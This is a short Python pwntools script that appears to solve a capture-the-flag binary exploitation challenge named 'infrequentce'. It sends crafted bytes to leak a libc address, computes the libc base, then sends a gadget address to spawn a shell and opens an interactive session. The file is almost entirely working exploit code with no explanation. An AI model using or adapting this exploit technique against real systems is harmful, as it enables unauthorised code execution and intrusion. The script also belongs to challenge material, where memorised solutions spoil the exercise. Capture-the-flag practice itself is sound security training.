#!/usr/bin/env python3
from pwn import *
import warnings
warnings.filterwarnings("ignore")
exe = ELF("./infrequentce")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.27.so")
# context.log_level='debug'
# p = remote("challs.pwnoh.io", 13374)
p = process([exe.path])
def gdbs():
    context.terminal = ["foot"]
    gdb.attach(p, gdbscript="""

               """)
    # p = gdb.debug([exe.path],"""
    #
    #                 """)

sla = lambda msg, data: p.sendlineafter(msg, data)
sa = lambda msg, data: p.sendafter(msg, data)
sl = lambda data: p.sendline(data)
s = lambda data: p.send(data)
# gdbs()
sla("uency analysis on:",p8(0xfd)*265+p8(0xff)*54)
p.recvuntil("showing up")
addr = int(p.recvuntil("time",drop=True))
log.info(f"leak: {hex(addr)}")
libc.address = addr -0x21c87
log.info(f"libcaddress: {hex(libc.address)}")
sla("(leave blank for default)",p64(libc.address + 0x4f2a5))







p.interactive()
# good luck pwning :)

